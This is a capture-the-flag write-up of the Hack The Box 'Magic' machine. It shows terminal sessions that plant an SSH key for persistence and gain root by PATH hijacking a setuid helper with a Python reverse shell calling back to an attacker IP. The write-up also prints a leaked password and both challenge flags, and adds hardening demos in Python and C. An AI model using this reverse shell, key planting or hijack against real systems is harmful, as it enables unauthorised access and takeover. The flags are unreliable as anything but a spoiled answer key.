theseus@ubuntu:/var/www/Magic/images$ id
id
uid=1000(theseus) gid=1000(theseus) groups=1000(theseus),100(users)

theseus@ubuntu:/var/www/Magic/images$ cd /home/theseus
cd /home/theseus
theseus@ubuntu:~$ ls
ls
Desktop    Downloads   Music     Public     user.txt
Documents  linpeas.sh  Pictures  Templates  Videos
theseus@ubuntu:~$ cat user.txt
cat user.txt
a6ec88cc7fa8f2ec4e81796f27bdac17
theseus@ubuntu:~$ 

2. Root

theseus@ubuntu:/var/www/Magic/images/uploads$ sudo -l
sudo -l
[sudo] password for theseus: Th3s3usW4sK1ng

Sorry, user theseus may not run sudo on ubuntu.
theseus@ubuntu:/var/www/Magic/images/uploads$ cd /home
cd /home
theseus@ubuntu:/home$ ls
ls
theseus
theseus@ubuntu:/home$ cd theseus
cd theseus
theseus@ubuntu:~$ ls -la
ls -la
total 92
drwxr-xr-x 15 theseus theseus 4096 Aug  1 08:05 .
drwxr-xr-x  3 root    root    4096 Oct 15  2019 ..
lrwxrwxrwx  1 theseus theseus    9 Oct 21  2019 .bash_history -> /dev/null
-rw-r--r--  1 theseus theseus  220 Oct 15  2019 .bash_logout
-rw-r--r--  1 theseus theseus   15 Oct 21  2019 .bash_profile
-rw-r--r--  1 theseus theseus 3771 Oct 15  2019 .bashrc
drwxrwxr-x 13 theseus theseus 4096 Mar 13 05:57 .cache
-rwxrwxrwx  1 theseus theseus    0 Aug  1 07:34 cat
-rw-rw-r--  1 theseus theseus 1024 Aug  1 07:42 .cat.swp
drwx------ 13 theseus theseus 4096 Oct 22  2019 .config
drwxr-xr-x  2 theseus theseus 4096 Oct 22  2019 Desktop
drwxr-xr-x  2 theseus theseus 4096 Oct 22  2019 Documents
drwxr-xr-x  2 theseus theseus 4096 Oct 22  2019 Downloads
-rwxrwxr-x  1 theseus theseus   19 Aug  1 06:47 fdisk
drwx------  3 theseus theseus 4096 Oct 21  2019 .gnupg
-rw-------  1 theseus theseus 7334 Apr 15 23:50 .ICEauthority
drwx------  3 theseus theseus 4096 Oct 21  2019 .local
drwxr-xr-x  2 theseus theseus 4096 Oct 22  2019 Music
drwxr-xr-x  2 theseus theseus 4096 Oct 22  2019 Pictures
drwxr-xr-x  2 theseus theseus 4096 Oct 22  2019 Public
drwx------  2 theseus theseus 4096 Aug  1 09:24 .ssh
drwxr-xr-x  2 theseus theseus 4096 Oct 22  2019 Templates
-r--------  1 theseus theseus   33 Aug  1 03:19 user.txt
drwxr-xr-x  2 theseus theseus 4096 Oct 22  2019 Videos
theseus@ubuntu:~$ cd .ssh
cd .ssh
theseus@ubuntu:~/.ssh$ ls -la
ls -la
total 12
drwx------  2 theseus theseus 4096 Aug  1 09:24 .
drwxr-xr-x 15 theseus theseus 4096 Aug  1 08:05 ..
-rw-rw-r--  1 theseus theseus  563 Aug  1 09:24 authorized_keys
theseus@ubuntu:~/.ssh$ 

authorized_keys is ours to write, so we add our own public key (note that it already holds a root@kali key left by someone else on this shared box). See Authorized-Keys

root@Host-001:~/Bureau/htb/magic# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): /root/Bureau/htb/magic/id_rsa
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /root/Bureau/htb/magic/id_rsa
Your public key has been saved in /root/Bureau/htb/magic/id_rsa.pub
The key fingerprint is:
SHA256:gJ4mi+myBrKh2dtwmlnjz36PND0W5KzlAFRUlbDOJTg root@Host-001
The key's randomart image is:
+---[RSA 3072]----+
|      .oo.oo..   |
|     o   . ..    |
|    . o E + .    |
|   . . o B o     |
|  . +   S B      |
|+o +     * .     |
|*=o +   + =      |
|*..X o ..+ .     |
|+o=.oo+....      |
+----[SHA256]-----+
root@Host-001:~/Bureau/htb/magic# ls -la 
total 104
drwxr-xr-x  2 root root  4096 août   2 10:23 .
drwxr-xr-x 14 root root  4096 août   1 09:50 ..
-rw-r--r--  1 root root  6008 avril 30 13:31 blank2.php.png
-rw-r--r--  1 root root  5914 avril 30 12:00 blank2.png_original
-rw-r--r--  1 root root  5976 avril 30 12:00 blank.php.png
-rw-------  1 root root  2602 août   2 10:23 id_rsa
-rw-r--r--  1 root root   567 août   2 10:23 id_rsa.pub
-rw-r--r--  1 root root 24609 avril 30 17:51 magic
-rw-r--r--  1 root root 20480 août   2 10:21 .magic.swp
-rwx------  1 root root  5493 avril 30 13:20 php-reverse-shell.php
-rw-r--r--  1 root root    30 avril 30 11:57 shell.php.png
-rw-r--r--  1 root root   487 avril 30 11:42 sqlmap_post.txt
root@Host-001:~/Bureau/htb/magic# cat id_rsa.pub
ssh-rsa <public key> root@Host-001
root@Host-001:~/Bureau/htb/magic# 
theseus@ubuntu:~/.ssh$ echo "ssh-rsa <public key> root@Host-001" >> authorized_keys
theseus@ubuntu:~/.ssh$ cat authorized_keys
cat authorized_keys
ssh-rsa <public key> root@kali
ssh-rsa <public key> root@Host-001
theseus@ubuntu:~/.ssh$ 
root@Host-001:~/Bureau/htb/magic# ssh -i id_rsa theseus@10.10.10.185
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 5.3.0-42-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

29 packages can be updated.
0 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Your Hardware Enablement Stack (HWE) is supported until April 2023.
Last login: Sat Aug  1 09:26:54 2020 from 10.10.14.141
theseus@ubuntu:~$ ls
cat	 Documents  fdisk  Pictures  Templates	Videos
Desktop  Downloads  Music  Public    user.txt
theseus@ubuntu:~$ 

For root we use sysinfo, which invokes fdisk by bare name and therefore resolves it through our PATH. We write a reverse shell as a script called fdisk, put its directory first in PATH, start a listener on port 1234 and run /bin/sysinfo:
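Before the transcript, an added example (mine, not from the writeup) of the mechanism: it resolves a bare command name along PATH the way the shell does, plants a fake fdisk in a temporary directory and shows that a caller using a bare name through the shell picks it up, then shows the hardened pattern (absolute path, argv list, fixed minimal environment). The fake fdisk only echoes a marker; on the box it was the reverse shell. Nothing here is privileged, since the point is the lookup, not the SUID bit.

```python
import os
import subprocess
import tempfile


def resolve(cmd, path):
    """First executable called `cmd` along `path`: what sh does for a bare command name."""
    for d in path.split(os.pathsep):
        cand = os.path.join(d, cmd)
        if os.path.isfile(cand) and os.access(cand, os.X_OK):
            return cand
    return None


def run_unsafe(cmdline, env):
    """The vulnerable pattern: a bare command name through the shell with the caller's
    environment. If the caller is privileged, whoever controls PATH controls the binary."""
    return subprocess.run(cmdline, shell=True, env=env, capture_output=True, text=True).stdout


def run_safe(abs_path, args):
    """Hardened: absolute path, argv list (no shell), and a fixed minimal environment."""
    env = {"PATH": "/usr/sbin:/usr/bin:/sbin:/bin"}
    return subprocess.run([abs_path, *args], env=env, capture_output=True, text=True).stdout


def demo_hijack():
    """Constructed scenario: plant a fake fdisk in a temp dir and put that dir first in PATH,
    exactly what the transcript does with /tmp/poc."""
    with tempfile.TemporaryDirectory() as d:
        fake = os.path.join(d, "fdisk")
        with open(fake, "w") as f:
            f.write("#!/bin/sh\necho HIJACKED by $(id -un)\n")  # on the box: the reverse shell
        os.chmod(fake, 0o755)
        env = {"PATH": d + os.pathsep + os.environ.get("PATH", "/usr/bin:/bin")}
        resolved = resolve("fdisk", env["PATH"])
        output = run_unsafe("fdisk -l", env).strip()
        return resolved == fake, output


if __name__ == "__main__":
    hijacked, out = demo_hijack()
    print("fake fdisk wins PATH lookup:", hijacked)
    print("output of 'fdisk -l':", out)
    print("PATH seen by a safely spawned child:", run_safe("/bin/sh", ["-c", "echo $PATH"]).strip())
```

The caveat worth remembering: the loader drops LD_PRELOAD and friends for a set-uid process, but PATH is just an environment variable that system() and popen() hand to /bin/sh untouched, so any privileged program that spawns tools by bare name is exploitable this way.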

theseus@ubuntu:/tmp/poc$ nano fdisk
theseus@ubuntu:/tmp/poc$ cat fdisk
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.77",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
theseus@ubuntu:/tmp/poc$ chmod 777 fdisk
theseus@ubuntu:/tmp/poc$ export PATH=/tmp/poc:$PATH
theseus@ubuntu:/tmp/poc$ /bin/sysinfo
====================Hardware Info====================
H/W path           Device      Class      Description
=====================================================
                               system     VMware Virtual Platform
/0                             bus        440BX Desktop Reference Platform
/0/0                           memory     86KiB BIOS
/0/1                           processor  AMD EPYC 7401P 24-Core Processor
/0/1/0                         memory     16KiB L1 cache
/0/1/1                         memory     16KiB L1 cache
/0/1/2                         memory     512KiB L2 cache
/0/1/3                         memory     512KiB L2 cache
/0/2                           processor  AMD EPYC 7401P 24-Core Processor
/0/28                          memory     System Memory
/0/28/0                        memory     4GiB DIMM DRAM EDO
/0/28/1                        memory     DIMM DRAM [empty]
/0/28/2                        memory     DIMM DRAM [empty]
/0/28/3                        memory     DIMM DRAM [empty]
/0/28/4                        memory     DIMM DRAM [empty]
/0/28/5                        memory     DIMM DRAM [empty]
/0/28/6                        memory     DIMM DRAM [empty]
/0/28/7                        memory     DIMM DRAM [empty]
/0/28/8                        memory     DIMM DRAM [empty]
/0/28/9                        memory     DIMM DRAM [empty]
/0/28/a                        memory     DIMM DRAM [empty]
/0/28/b                        memory     DIMM DRAM [empty]
/0/28/c                        memory     DIMM DRAM [empty]
/0/28/d                        memory     DIMM DRAM [empty]
/0/28/e                        memory     DIMM DRAM [empty]
/0/28/f                        memory     DIMM DRAM [empty]
/0/28/10                       memory     DIMM DRAM [empty]
/0/28/11                       memory     DIMM DRAM [empty]
/0/28/12                       memory     DIMM DRAM [empty]
/0/28/13                       memory     DIMM DRAM [empty]
/0/28/14                       memory     DIMM DRAM [empty]
/0/28/15                       memory     DIMM DRAM [empty]
/0/28/16                       memory     DIMM DRAM [empty]
/0/28/17                       memory     DIMM DRAM [empty]
/0/28/18                       memory     DIMM DRAM [empty]
/0/28/19                       memory     DIMM DRAM [empty]
/0/28/1a                       memory     DIMM DRAM [empty]
/0/28/1b                       memory     DIMM DRAM [empty]
/0/28/1c                       memory     DIMM DRAM [empty]
/0/28/1d                       memory     DIMM DRAM [empty]
/0/28/1e                       memory     DIMM DRAM [empty]
/0/28/1f                       memory     DIMM DRAM [empty]
/0/28/20                       memory     DIMM DRAM [empty]
/0/28/21                       memory     DIMM DRAM [empty]
/0/28/22                       memory     DIMM DRAM [empty]
/0/28/23                       memory     DIMM DRAM [empty]
/0/28/24                       memory     DIMM DRAM [empty]
/0/28/25                       memory     DIMM DRAM [empty]
/0/28/26                       memory     DIMM DRAM [empty]
/0/28/27                       memory     DIMM DRAM [empty]
/0/28/28                       memory     DIMM DRAM [empty]
/0/28/29                       memory     DIMM DRAM [empty]
/0/28/2a                       memory     DIMM DRAM [empty]
/0/28/2b                       memory     DIMM DRAM [empty]
/0/28/2c                       memory     DIMM DRAM [empty]
/0/28/2d                       memory     DIMM DRAM [empty]
/0/28/2e                       memory     DIMM DRAM [empty]
/0/28/2f                       memory     DIMM DRAM [empty]
/0/28/30                       memory     DIMM DRAM [empty]
/0/28/31                       memory     DIMM DRAM [empty]
/0/28/32                       memory     DIMM DRAM [empty]
/0/28/33                       memory     DIMM DRAM [empty]
/0/28/34                       memory     DIMM DRAM [empty]
/0/28/35                       memory     DIMM DRAM [empty]
/0/28/36                       memory     DIMM DRAM [empty]
/0/28/37                       memory     DIMM DRAM [empty]
/0/28/38                       memory     DIMM DRAM [empty]
/0/28/39                       memory     DIMM DRAM [empty]
/0/28/3a                       memory     DIMM DRAM [empty]
/0/28/3b                       memory     DIMM DRAM [empty]
/0/28/3c                       memory     DIMM DRAM [empty]
/0/28/3d                       memory     DIMM DRAM [empty]
/0/28/3e                       memory     DIMM DRAM [empty]
/0/28/3f                       memory     DIMM DRAM [empty]
/0/3                           memory     
/0/3/0                         memory     DIMM [empty]
/0/4                           memory     
/0/4/0                         memory     DIMM [empty]
/0/5                           memory     
/0/5/0                         memory     DIMM [empty]
/0/6                           memory     
/0/6/0                         memory     DIMM [empty]
/0/7                           memory     
/0/7/0                         memory     DIMM [empty]
/0/8                           memory     
/0/8/0                         memory     DIMM [empty]
/0/9                           memory     
/0/9/0                         memory     DIMM [empty]
/0/a                           memory     
/0/a/0                         memory     DIMM [empty]
/0/b                           memory     
/0/b/0                         memory     DIMM [empty]
/0/c                           memory     
/0/c/0                         memory     DIMM [empty]
/0/d                           memory     
/0/d/0                         memory     DIMM [empty]
/0/e                           memory     
/0/e/0                         memory     DIMM [empty]
/0/f                           memory     
/0/f/0                         memory     DIMM [empty]
/0/10                          memory     
/0/10/0                        memory     DIMM [empty]
/0/11                          memory     
/0/11/0                        memory     DIMM [empty]
/0/12                          memory     
/0/12/0                        memory     DIMM [empty]
/0/13                          memory     
/0/13/0                        memory     DIMM [empty]
/0/14                          memory     
/0/14/0                        memory     DIMM [empty]
/0/15                          memory     
/0/15/0                        memory     DIMM [empty]
/0/16                          memory     
/0/16/0                        memory     DIMM [empty]
/0/17                          memory     
/0/17/0                        memory     DIMM [empty]
/0/18                          memory     
/0/18/0                        memory     DIMM [empty]
/0/19                          memory     
/0/19/0                        memory     DIMM [empty]
/0/1a                          memory     
/0/1a/0                        memory     DIMM [empty]
/0/1b                          memory     
/0/1b/0                        memory     DIMM [empty]
/0/1c                          memory     
/0/1c/0                        memory     DIMM [empty]
/0/1d                          memory     
/0/1d/0                        memory     DIMM [empty]
/0/1e                          memory     
/0/1e/0                        memory     DIMM [empty]
/0/1f                          memory     
/0/1f/0                        memory     DIMM [empty]
/0/20                          memory     
/0/20/0                        memory     DIMM [empty]
/0/21                          memory     
/0/21/0                        memory     DIMM [empty]
/0/22                          memory     
/0/22/0                        memory     DIMM [empty]
/0/23                          memory     
/0/23/0                        memory     DIMM [empty]
/0/24                          memory     
/0/24/0                        memory     DIMM [empty]
/0/25                          memory     
/0/25/0                        memory     DIMM [empty]
/0/26                          memory     
/0/26/0                        memory     DIMM [empty]
/0/27                          memory     
/0/27/0                        memory     DIMM [empty]
/0/29                          memory     
/0/29/0                        memory     DIMM [empty]
/0/2a                          memory     
/0/2a/0                        memory     DIMM [empty]
/0/2b                          memory     
/0/2b/0                        memory     DIMM [empty]
/0/2c                          memory     
/0/2c/0                        memory     DIMM [empty]
/0/2d                          memory     
/0/2d/0                        memory     DIMM [empty]
/0/2e                          memory     
/0/2e/0                        memory     DIMM [empty]
/0/2f                          memory     
/0/2f/0                        memory     DIMM [empty]
/0/30                          memory     
/0/30/0                        memory     DIMM [empty]
/0/31                          memory     
/0/31/0                        memory     DIMM [empty]
/0/32                          memory     
/0/32/0                        memory     DIMM [empty]
/0/33                          memory     
/0/33/0                        memory     DIMM [empty]
/0/34                          memory     
/0/34/0                        memory     DIMM [empty]
/0/35                          memory     
/0/35/0                        memory     DIMM [empty]
/0/36                          memory     
/0/36/0                        memory     DIMM [empty]
/0/37                          memory     
/0/37/0                        memory     DIMM [empty]
/0/38                          memory     
/0/38/0                        memory     DIMM [empty]
/0/39                          memory     
/0/39/0                        memory     DIMM [empty]
/0/3a                          memory     
/0/3a/0                        memory     DIMM [empty]
/0/3b                          memory     
/0/3b/0                        memory     DIMM [empty]
/0/3c                          memory     
/0/3c/0                        memory     DIMM [empty]
/0/3d                          memory     
/0/3d/0                        memory     DIMM [empty]
/0/3e                          memory     
/0/3e/0                        memory     DIMM [empty]
/0/3f                          memory     
/0/3f/0                        memory     DIMM [empty]
/0/40                          memory     
/0/40/0                        memory     DIMM [empty]
/0/41                          memory     
/0/41/0                        memory     DIMM [empty]
/0/42                          memory     
/0/42/0                        memory     DIMM [empty]
/0/43                          memory     
/0/43/0                        memory     DIMM [empty]
/0/44                          memory     
/0/45                          memory     
/0/100                         bridge     440BX/ZX/DX - 82443BX/ZX/DX Host bridge
/0/100/1                       bridge     440BX/ZX/DX - 82443BX/ZX/DX AGP bridge
/0/100/7                       bridge     82371AB/EB/MB PIIX4 ISA
/0/100/7.1                     storage    82371AB/EB/MB PIIX4 IDE
/0/100/7.3                     bridge     82371AB/EB/MB PIIX4 ACPI
/0/100/7.7                     generic    Virtual Machine Communication Interface
/0/100/f                       display    SVGA II Adapter
/0/100/10          scsi2       storage    53c1030 PCI-X Fusion-MPT Dual Ultra320 SCSI
/0/100/10/0.0.0    /dev/sda    disk       21GB Virtual disk
/0/100/10/0.0.0/1  /dev/sda1   volume     19GiB EXT4 volume
/0/100/11                      bridge     PCI bridge
/0/100/11/0                    bus        USB1.1 UHCI Controller
/0/100/11/0/1      usb2        bus        UHCI Host Controller
/0/100/11/0/1/1                input      VMware Virtual USB Mouse
/0/100/11/0/1/2                bus        VMware Virtual USB Hub
/0/100/11/1                    bus        USB2 EHCI Controller
/0/100/11/1/1      usb1        bus        EHCI Host Controller
/0/100/15                      bridge     PCI Express Root Port
/0/100/15/0        ens160      network    VMXNET3 Ethernet Controller
/0/100/15.1                    bridge     PCI Express Root Port
/0/100/15.2                    bridge     PCI Express Root Port
/0/100/15.3                    bridge     PCI Express Root Port
/0/100/15.4                    bridge     PCI Express Root Port
/0/100/15.5                    bridge     PCI Express Root Port
/0/100/15.6                    bridge     PCI Express Root Port
/0/100/15.7                    bridge     PCI Express Root Port
/0/100/16                      bridge     PCI Express Root Port
/0/100/16.1                    bridge     PCI Express Root Port
/0/100/16.2                    bridge     PCI Express Root Port
/0/100/16.3                    bridge     PCI Express Root Port
/0/100/16.4                    bridge     PCI Express Root Port
/0/100/16.5                    bridge     PCI Express Root Port
/0/100/16.6                    bridge     PCI Express Root Port
/0/100/16.7                    bridge     PCI Express Root Port
/0/100/17                      bridge     PCI Express Root Port
/0/100/17.1                    bridge     PCI Express Root Port
/0/100/17.2                    bridge     PCI Express Root Port
/0/100/17.3                    bridge     PCI Express Root Port
/0/100/17.4                    bridge     PCI Express Root Port
/0/100/17.5                    bridge     PCI Express Root Port
/0/100/17.6                    bridge     PCI Express Root Port
/0/100/17.7                    bridge     PCI Express Root Port
/0/100/18                      bridge     PCI Express Root Port
/0/100/18.1                    bridge     PCI Express Root Port
/0/100/18.2                    bridge     PCI Express Root Port
/0/100/18.3                    bridge     PCI Express Root Port
/0/100/18.4                    bridge     PCI Express Root Port
/0/100/18.5                    bridge     PCI Express Root Port
/0/100/18.6                    bridge     PCI Express Root Port
/0/100/18.7                    bridge     PCI Express Root Port
/0/46              scsi0       storage    
/0/46/0.0.0        /dev/cdrom  disk       VMware IDE CDR00
/1                             system     

====================Disk Info====================

====================CPU Info====================
processor	: 0
vendor_id	: AuthenticAMD
cpu family	: 23
model		: 1
model name	: AMD EPYC 7401P 24-Core Processor
stepping	: 2
microcode	: 0x8001230
cpu MHz		: 1999.999
cache size	: 512 KB
physical id	: 0
siblings	: 1
core id		: 0
cpu cores	: 1
apicid		: 0
initial apicid	: 0
fpu		: yes
fpu_exception	: yes
cpuid level	: 13
wp		: yes
flags		: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc rep_good nopl tsc_reliable nonstop_tsc cpuid extd_apicid pni pclmulqdq ssse3 fma cx16 sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ssbd ibpb vmmcall fsgsbase bmi1 avx2 smep bmi2 rdseed adx smap clflushopt sha_ni xsaveopt xsavec xsaves clzero arat overflow_recov succor
bugs		: fxsave_leak sysret_ss_attrs null_seg spectre_v1 spectre_v2 spec_store_bypass
bogomips	: 3999.99
TLB size	: 2560 4K pages
clflush size	: 64
cache_alignment	: 64
address sizes	: 43 bits physical, 48 bits virtual
power management:

processor	: 1
vendor_id	: AuthenticAMD
cpu family	: 23
model		: 1
model name	: AMD EPYC 7401P 24-Core Processor
stepping	: 2
microcode	: 0x8001230
cpu MHz		: 1999.999
cache size	: 512 KB
physical id	: 2
siblings	: 1
core id		: 0
cpu cores	: 1
apicid		: 2
initial apicid	: 2
fpu		: yes
fpu_exception	: yes
cpuid level	: 13
wp		: yes
flags		: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc rep_good nopl tsc_reliable nonstop_tsc cpuid extd_apicid pni pclmulqdq ssse3 fma cx16 sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ssbd ibpb vmmcall fsgsbase bmi1 avx2 smep bmi2 rdseed adx smap clflushopt sha_ni xsaveopt xsavec xsaves clzero arat overflow_recov succor
bugs		: fxsave_leak sysret_ss_attrs null_seg spectre_v1 spectre_v2 spec_store_bypass
bogomips	: 3999.99
TLB size	: 2560 4K pages
clflush size	: 64
cache_alignment	: 64
address sizes	: 43 bits physical, 48 bits virtual
power management:


====================MEM Usage=====================
              total        used        free      shared  buff/cache   available
Mem:           3.8G        591M        1.8G        4.1M        1.5G        3.0G
Swap:          947M          0B        947M
theseus@ubuntu:/tmp/poc$ 
root@Host-001:~# nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.14.77] from (UNKNOWN) [10.10.10.185] 38992
# id
uid=0(root) gid=0(root) groups=0(root),100(users),1000(theseus)
# cat /root/root.txt
1897a41132f21627215fbcd8a217a330
#
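The root shell above is the result of a setuid helper that looks its tools up through the caller's PATH, so a directory prepended to PATH is enough to substitute the binary that runs as root. The C program below is an added example, not the Magic box's sysinfo source (which is not on the page): it reconstructs the unsafe pattern next to a hardened launcher. `run_unsafe` hands a bare command name to `system()`; `run_hardened` refuses anything but an absolute path, skips the shell and executes with a fixed environment. The assumption that sysinfo calls `lshw` by bare name is inferred from the page, where the PATH prefix alone was sufficient; the fake `lshw` planted under /tmp and its exit code 42 are constructed for the demo.

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/wait.h>

/* Environment handed to every child of the hardened launcher. Nothing from
 * the caller (PATH, LD_PRELOAD, IFS, ...) is inherited, so a directory the
 * caller controls can never take part in command lookup. */
static char *const SAFE_ENV[] = { "PATH=/usr/sbin:/usr/bin:/sbin:/bin", NULL };

/* UNSAFE pattern (assumed to be what the box's sysinfo does; its source is
 * not on the page): a bare command name handed to system(). /bin/sh resolves
 * "lshw" through the caller's PATH, so with PATH=/tmp/poc:$PATH the file
 * /tmp/poc/lshw runs with the setuid binary's privileges. */
int run_unsafe(const char *cmdline) {
    int st = system(cmdline);
    return (st != -1 && WIFEXITED(st)) ? WEXITSTATUS(st) : -1;
}

/* HARDENED pattern: absolute path only, explicit argv, fixed environment,
 * no shell in between. Returns the child's exit status, or -1 on refusal
 * or failure. (A real setuid helper should also drop privileges wherever
 * it can; that is out of scope here.) */
int run_hardened(const char *abs_path, char *const argv[]) {
    if (abs_path == NULL || abs_path[0] != '/')
        return -1;                      /* PATH-dependent name: refuse */
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(abs_path, argv, SAFE_ENV);
        _exit(127);                     /* only reached if execve failed */
    }
    int st;
    if (waitpid(pid, &st, 0) < 0)
        return -1;
    return WIFEXITED(st) ? WEXITSTATUS(st) : -1;
}

/* Demo fixture (constructed): plant a fake "lshw" that just exits 42 in a
 * fresh directory and put that directory first in this process's PATH,
 * mirroring the page's /tmp/poc setup. Exit code 42 tells us which binary
 * actually ran. Returns the directory, or NULL on error. */
const char *plant_fake_lshw(void) {
    static char dir[64];
    snprintf(dir, sizeof dir, "/tmp/pathdemo.%ld", (long)getpid());
    if (mkdir(dir, 0700) != 0)
        return NULL;
    char file[96];
    snprintf(file, sizeof file, "%s/lshw", dir);
    int fd = open(file, O_WRONLY | O_CREAT | O_TRUNC, 0755);
    if (fd < 0)
        return NULL;
    const char *body = "#!/bin/sh\nexit 42\n";
    if (write(fd, body, strlen(body)) != (ssize_t)strlen(body))
        return NULL;
    close(fd);
    const char *old = getenv("PATH");
    char newpath[4096];
    snprintf(newpath, sizeof newpath, "%s:%s", dir, old ? old : "/usr/bin:/bin");
    setenv("PATH", newpath, 1);
    return dir;
}

int main(void) {
    const char *dir = plant_fake_lshw();
    if (dir == NULL) {
        perror("plant_fake_lshw");
        return 1;
    }
    printf("planted fake lshw in %s, PATH now starts with it\n", dir);

    /* The unsafe launcher runs whatever PATH finds first: the fake (42). */
    printf("run_unsafe(\"lshw\")            -> %d\n", run_unsafe("lshw"));

    /* The hardened launcher never sees the planted directory. */
    char *const check_path[] = { "sh", "-c",
        "[ \"$PATH\" = /usr/sbin:/usr/bin:/sbin:/bin ]", NULL };
    printf("child PATH is the fixed one    -> %d (0 = yes)\n",
           run_hardened("/bin/sh", check_path));
    char *const via_sh[] = { "sh", "-c", "lshw", NULL };
    printf("run_hardened(/bin/sh -c lshw)  -> %d (anything but 42)\n",
           run_hardened("/bin/sh", via_sh));
    printf("run_hardened(\"sh\", ...)        -> %d (refused)\n",
           run_hardened("sh", via_sh));
    return 0;
}
```

Build and run with `cc -Wall -o pathdemo pathdemo.c && ./pathdemo`; the demo leaves `/tmp/pathdemo.<pid>` behind, remove it afterwards. The takeaway for whoever ships a setuid helper like sysinfo is the hardened half: absolute paths, an explicit argv, a fixed environment and no intermediate shell, or better, no setuid bit at all and a sudo rule restricted to the exact command. On the detection side, a setuid binary whose strings show bare command names (`lshw`, `fdisk`, `free`, `cat`) is the thing to flag during an audit.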

CC-BY

This work is licensed under a Creative Commons Attribution 4.0 International License.